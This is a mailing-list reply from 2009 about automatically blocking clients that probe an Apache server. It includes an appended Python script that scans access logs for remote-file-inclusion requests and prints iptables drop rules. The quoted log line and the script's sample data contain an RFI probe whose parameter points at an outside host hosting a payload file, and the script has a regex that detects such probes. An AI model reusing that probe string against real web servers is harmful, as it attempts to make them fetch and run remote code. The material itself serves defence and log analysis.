2009/7/8 ESGLinux <esggrupos@xxxxxxxxx>:
> Hi all,
> I'm having a problem with an Apache web server.
>
> I get a lot of accesses of this kind:
>
> x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
>
> where x.x.x.x is the IP of the client. I suppose this IP is trying to find a
> security hole in my system, so what I do manually is this:

With Apache, a very useful tool to block these events is mod_security.

> iptables -A INPUT -s x.x.x.x -p tcp -m tcp --dport 80 -j DROP
>
> I want to do this automatically. I'm thinking of using logwatch but I'm not
> sure how to do it. (I'm testing, but for the moment I haven't found the
> solution.)
>
> Does anybody know another way to do what I want?
>
> By the way, I'm interested in limiting the connections to my webserver using
> iptables with the limit module and the burst argument. What do you think about it?
> Is it a good solution or am I on the wrong track? Do you know how to prevent DoS
> attacks?

You can do this with iptables, but always keep in mind the corporate proxies and gateways. A governmental proxy, for example, can make a lot of legitimate connections.

Hope this helps.
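An added example (not part of the thread, and not code from either poster): a log scan that automates the manual step described above, counting requests whose query parameter value is itself a URL and rendering the post's iptables rule for repeat offenders, with an allowlist for shared proxies as the reply advises. The threshold, the allowlisted network, the function names and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote

# Common/combined log format: client, identd, user, [time], "METHOD URL PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)[^"]*" \d{3} ')
# Query parameter whose value is itself a URL, like CONFIG[pear_dir]=http://...
RFI_RE = re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.IGNORECASE)

def probing_clients(lines, threshold=3, allow=()):
    """Return client IPs with at least `threshold` RFI-style requests.
    `allow` lists networks that must never be blocked (shared proxies, gateways)."""
    allowed = [ipaddress.ip_network(net) for net in allow]
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        # Decode %3A%2F%2F first so percent-encoded URLs are counted too.
        if not m or not RFI_RE.search(unquote(m.group(2))):
            continue
        try:
            ip = ipaddress.ip_address(m.group(1))  # rejects hostnames and junk
        except ValueError:
            continue
        if not any(ip in net for net in allowed):
            hits[ip] += 1
    return sorted(str(ip) for ip, n in hits.items() if n >= threshold)

def drop_rules(ips):
    """Render the iptables command from the original post for each IP."""
    return [f"iptables -A INPUT -s {ip} -p tcp -m tcp --dport 80 -j DROP" for ip in ips]

def _line(ip, url):  # builds one constructed access-log line
    return f'{ip} - - [08/Jul/2009:09:42:20 +0200] "GET {url} HTTP/1.1" 404 1015 "-" "Mozilla/5.0"'

# Constructed sample data (documentation address ranges, placeholder host).
PROBE = "//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://example.test/id1.txt???"
SAMPLE = (
    [_line("203.0.113.7", PROBE)] * 3
    + [_line("198.51.100.20", PROBE)] * 5               # behind an allowlisted proxy
    + [_line("192.0.2.5", PROBE)]                       # below the threshold
    + [_line("192.0.2.9", "/index.php?page=2")] * 10    # ordinary traffic
    + [_line("203.0.113.8", "/a.php?f=http%3A%2F%2Fexample.test%2Fx")] * 3
)

if __name__ == "__main__":
    for cmd in drop_rules(probing_clients(SAMPLE, allow=["198.51.100.0/24"])):
        print(cmd)
```

Legitimate parameters that carry a URL (redirect targets, for instance) match the same pattern, so review the generated rules before applying them.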